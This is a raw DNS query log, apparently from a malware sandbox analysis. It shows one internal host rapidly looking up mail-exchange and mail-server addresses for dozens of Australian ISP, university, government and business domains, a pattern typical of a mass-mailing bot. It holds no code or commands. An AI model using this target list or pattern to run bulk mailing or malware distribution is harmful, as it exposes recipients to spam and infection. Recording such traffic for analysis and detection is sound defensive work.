                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.508702993 CET192.168.2.38.8.8.80xf78bStandard query (0)bpgconsultants.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.635121107 CET192.168.2.38.8.8.80x7f9fStandard query (0)primusonline.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.637022972 CET192.168.2.38.8.8.80x50eeStandard query (0)bpgconsultants-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.692784071 CET192.168.2.38.8.8.80x5db0Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.710916996 CET192.168.2.38.8.8.80x5749Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.799536943 CET192.168.2.38.8.8.80x2efaStandard query (0)eedesigns.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.897928953 CET192.168.2.38.8.8.80x4131Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.921130896 CET192.168.2.38.8.8.80xda9Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.953989983 CET192.168.2.38.8.8.80xcb0dStandard query (0)mx.syd.iprimus.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:03.979989052 CET192.168.2.38.8.8.80xb588Standard query (0)vantex.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.049607038 CET192.168.2.38.8.8.80xcc90Standard query (0)mla.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.069266081 CET192.168.2.38.8.8.80xf5efStandard query (0)cust7610-2.in.mailcontrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.128123999 CET192.168.2.38.8.8.80x3254Standard query (0)hsbc.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.148065090 CET192.168.2.38.8.8.80xfeb5Standard query (0)mxb-00299f02.gslb.pphosted.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.244143009 CET192.168.2.38.8.8.80x9bebStandard query (0)eedesigns-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.299699068 CET192.168.2.38.8.8.80xf946Standard query (0)edumail.vic.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.360362053 CET192.168.2.38.8.8.80x962eStandard query (0)aussie.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.430866003 CET192.168.2.38.8.8.80x81f5Standard query (0)edumail-vic-gov-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.437771082 CET192.168.2.38.8.8.80x61f2Standard query (0)soniccomputing.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.479981899 CET192.168.2.38.8.8.80x20c5Standard query (0)au-smtp-inbound-1.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.518714905 CET192.168.2.38.8.8.80xd467Standard query (0)workskil.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.565733910 CET192.168.2.38.8.8.80x28d8Standard query (0)soniccomputing-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.569871902 CET192.168.2.38.8.8.80x3ac3Standard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.579169989 CET192.168.2.38.8.8.80x2817Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.613506079 CET192.168.2.38.8.8.80x4b49Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.673274040 CET192.168.2.38.8.8.80x8341Standard query (0)findtime.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.745471001 CET192.168.2.38.8.8.80xf0e8Standard query (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.765960932 CET192.168.2.38.8.8.80x3e7Standard query (0)extmail.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.833875895 CET192.168.2.38.8.8.80x9d26Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.854871988 CET192.168.2.38.8.8.80x3e2cStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.911143064 CET192.168.2.38.8.8.80x5763Standard query (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.936044931 CET192.168.2.38.8.8.80x786aStandard query (0)extmail.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.988950968 CET192.168.2.38.8.8.80x1b02Standard query (0)netspace.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:04.999320030 CET192.168.2.38.8.8.80x2c07Standard query (0)findtime.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.051676035 CET192.168.2.38.8.8.80x8a7Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.071485996 CET192.168.2.38.8.8.80x3276Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.177617073 CET192.168.2.38.8.8.80xa6faStandard query (0)ac.auone-net.jpMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.220818996 CET192.168.2.38.8.8.80x4be0Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.253973007 CET192.168.2.38.8.8.80x6f53Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.304819107 CET192.168.2.38.8.8.80x36b0Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.305963993 CET192.168.2.38.8.8.80xce4cStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.324596882 CET192.168.2.38.8.8.80x6a97Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.401602030 CET192.168.2.38.8.8.80x780cStandard query (0)student.adelaide.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.453911066 CET192.168.2.38.8.8.80x7d33Standard query (0)mx01.auone-net.jpA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.502288103 CET192.168.2.38.8.8.80x21d2Standard query (0)coffeeautomatico.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.571692944 CET192.168.2.38.8.8.80xf9e0Standard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.597529888 CET192.168.2.38.8.8.80x6da4Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.644498110 CET192.168.2.38.8.8.80x8c0eStandard query (0)templetonknight.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.739840031 CET192.168.2.38.8.8.80x2f83Standard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.740685940 CET192.168.2.38.8.8.80x8e22Standard query (0)students.mq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.835047007 CET192.168.2.38.8.8.80x5f56Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.858814955 CET192.168.2.38.8.8.80xa5c4Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.894382954 CET192.168.2.38.8.8.80x8a9aStandard query (0)mx2.nameserver.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.937208891 CET192.168.2.38.8.8.80xffceStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:05.969115973 CET192.168.2.38.8.8.80xb0Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.014786959 CET192.168.2.38.8.8.80x5daeStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.062223911 CET192.168.2.38.8.8.80x841dStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.113320112 CET192.168.2.38.8.8.80xd057Standard query (0)blundstone.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.195430040 CET192.168.2.38.8.8.80xb587Standard query (0)nanosonics.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.228434086 CET192.168.2.38.8.8.80xc699Standard query (0)blundstone-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.284053087 CET192.168.2.38.8.8.80x5882Standard query (0)dcsi.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.331002951 CET192.168.2.38.8.8.80xbfd9Standard query (0)nanosonics-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.361041069 CET192.168.2.38.8.8.80x2198Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.379806042 CET192.168.2.38.8.8.80xbf05Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.445784092 CET192.168.2.38.8.8.80xb8ceStandard query (0)aspmx4.googlemail.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.471837997 CET192.168.2.38.8.8.80xd19cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.492257118 CET192.168.2.38.8.8.80x92eaStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.550350904 CET192.168.2.38.8.8.80x1e69Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.577289104 CET192.168.2.38.8.8.80x5759Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.602236986 CET192.168.2.38.8.8.80xfdaStandard query (0)mail.dcsi.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.634732008 CET192.168.2.38.8.8.80xe51dStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.663716078 CET192.168.2.38.8.8.80x338eStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.723891020 CET192.168.2.38.8.8.80x23eStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.743227005 CET192.168.2.38.8.8.80xd75fStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.816950083 CET192.168.2.38.8.8.80x803aStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.841296911 CET192.168.2.38.8.8.80xad92Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.894493103 CET192.168.2.38.8.8.80x29f9Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:06.924834967 CET192.168.2.38.8.8.80xf26cStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.006356001 CET192.168.2.38.8.8.80x702cStandard query (0)eq.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.071546078 CET192.168.2.38.8.8.80x2d95Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.103493929 CET192.168.2.38.8.8.80x4456Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.160517931 CET192.168.2.38.8.8.80x975cStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.182382107 CET192.168.2.38.8.8.80x341dStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.228343010 CET192.168.2.38.8.8.80x45d0Standard query (0)eq-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.250305891 CET192.168.2.38.8.8.80x9beeStandard query (0)surtek.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.333066940 CET192.168.2.38.8.8.80xae93Standard query (0)viewnews.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.397181988 CET192.168.2.38.8.8.80xbd68Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.416532993 CET192.168.2.38.8.8.80xeb64Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.455226898 CET192.168.2.38.8.8.80xc64Standard query (0)ALT4.ASPMX.L.GOOGLE.COMA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.468766928 CET192.168.2.38.8.8.80x8129Standard query (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.490283012 CET192.168.2.38.8.8.80xf961Standard query (0)extmail.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.548566103 CET192.168.2.38.8.8.80x80d0Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.569056034 CET192.168.2.38.8.8.80x5aeaStandard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.674978971 CET192.168.2.38.8.8.80x22adStandard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.696041107 CET192.168.2.38.8.8.80x56cbStandard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.786766052 CET192.168.2.38.8.8.80xaf1Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:07.807157040 CET192.168.2.38.8.8.80x2c31Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.056363106 CET192.168.2.38.8.8.80xbdaaStandard query (0)nac.nsw.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.134252071 CET192.168.2.38.8.8.80x8908Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.146327972 CET192.168.2.38.8.8.80x118Standard query (0)nac-nsw-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.206624985 CET192.168.2.38.8.8.80xc90bStandard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.228862047 CET192.168.2.38.8.8.80xdcf8Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.264753103 CET192.168.2.38.8.8.80x2ae4Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.364130020 CET192.168.2.38.8.8.80x5249Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.427968979 CET192.168.2.38.8.8.80xa562Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.450645924 CET192.168.2.38.8.8.80x8eafStandard query (0)austarnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.476578951 CET192.168.2.38.8.8.80x7e55Standard query (0)mail.austarnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.559566975 CET192.168.2.38.8.8.80x46b1Standard query (0)edu.nsw.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.782793999 CET192.168.2.38.8.8.80x113cStandard query (0)vsapinconsulting.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:08.898643970 CET192.168.2.38.8.8.80xd6b9Standard query (0)hockingstuart.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:09.995187998 CET192.168.2.38.8.8.80xb173Standard query (0)hockingstuart-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.021485090 CET192.168.2.38.8.8.80xbb2dStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.087953091 CET192.168.2.38.8.8.80xa5f8Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.095881939 CET192.168.2.38.8.8.80x9f0Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.136085033 CET192.168.2.38.8.8.80x430Standard query (0)mta5.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.398149967 CET192.168.2.38.8.8.80xf187Standard query (0)rawson.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:10.416395903 CET192.168.2.38.8.8.80x90c4Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.766304970 CET192.168.2.38.8.8.80xe827Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.768871069 CET192.168.2.38.8.8.80x5d3dStandard query (0)au-smtp-inbound-2.mimecast.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:11.959342957 CET192.168.2.38.8.8.80xb229Standard query (0)student.ecu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.013839006 CET192.168.2.38.8.8.80xf401Standard query (0)ncable.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.101649046 CET192.168.2.38.8.8.80x783bStandard query (0)rigolismash.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.244270086 CET192.168.2.38.8.8.80xe4fbStandard query (0)veritel.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.275135040 CET192.168.2.38.8.8.80x329eStandard query (0)student-ecu-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.280224085 CET192.168.2.38.8.8.80x9741Standard query (0)webcentral.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.366399050 CET192.168.2.38.8.8.80xd18cStandard query (0)westnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.383325100 CET192.168.2.38.8.8.80xa88eStandard query (0)mx.ncable.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.385384083 CET192.168.2.38.8.8.80x13dcStandard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.440677881 CET192.168.2.38.8.8.80x4d4bStandard query (0)uqconnect.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.506647110 CET192.168.2.38.8.8.80x854eStandard query (0)hammer.websitemanagers.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.506732941 CET192.168.2.38.8.8.80x7722Standard query (0)adventureworld.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.586699009 CET192.168.2.38.8.8.80xdf26Standard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.610574961 CET192.168.2.38.8.8.80xe75cStandard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.622668982 CET192.168.2.38.8.8.80x312bStandard query (0)adventureworld-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.649338007 CET192.168.2.38.8.8.80xd93bStandard query (0)immi.gov.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.674217939 CET192.168.2.38.8.8.80x877fStandard query (0)webcentral-com-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.677532911 CET192.168.2.38.8.8.80x284aStandard query (0)dibp-ibmail2.msng.telstra.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.742292881 CET192.168.2.38.8.8.80xe0dbStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.761756897 CET192.168.2.38.8.8.80x91afStandard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.835289955 CET192.168.2.38.8.8.80xb8Standard query (0)netc.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.896513939 CET192.168.2.38.8.8.80x54bbStandard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.917192936 CET192.168.2.38.8.8.80x70c1Standard query (0)mta6.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:12.964102983 CET192.168.2.38.8.8.80x2f0eStandard query (0)symbolix.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.037115097 CET192.168.2.38.8.8.80x4160Standard query (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.057707071 CET192.168.2.38.8.8.80xcb3Standard query (0)extmail.optusnet.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.158653975 CET192.168.2.38.8.8.80x107Standard query (0)akoqi.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.189398050 CET192.168.2.38.8.8.80xfadcStandard query (0)uqconnect-edu-au.mail.protection.outlook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.236494064 CET192.168.2.38.8.8.80x1711Standard query (0)asav.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.258039951 CET192.168.2.38.8.8.80x686eStandard query (0)bigpond.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.285175085 CET192.168.2.38.8.8.80x6132Standard query (0)extmail.bpbb.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.361078978 CET192.168.2.38.8.8.80xada9Standard query (0)bigpond.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.371763945 CET192.168.2.38.8.8.80xa88eStandard query (0)mx.ncable.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.383373976 CET192.168.2.38.8.8.80xac1dStandard query (0)extmail.bigpond.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.388374090 CET192.168.2.38.8.8.80x6959Standard query (0)aspmx.l.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.468250990 CET192.168.2.38.8.8.80xbd66Standard query (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.494457006 CET192.168.2.38.8.8.80x4015Standard query (0)mta7.am0.yahoodns.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.571103096 CET192.168.2.38.8.8.80x9046Standard query (0)jcu.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.630172014 CET192.168.2.38.8.8.80x2eaeStandard query (0)ains.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.722243071 CET192.168.2.38.8.8.80x969Standard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.742809057 CET192.168.2.38.8.8.80x5a5cStandard query (0)asav2.iinet.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.807611942 CET192.168.2.38.8.8.80x2403Standard query (0)mail.ains.net.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.834367037 CET192.168.2.38.8.8.80xeb53Standard query (0)micromaintenance.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.914263964 CET192.168.2.38.8.8.80x8b88Standard query (0)smtp-in.jcu.edu.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:55:13.922602892 CET192.168.2.38.8.8.80xca2dStandard query (0)iinet.net.auMX (Mail exchange)IN (0x0001)false
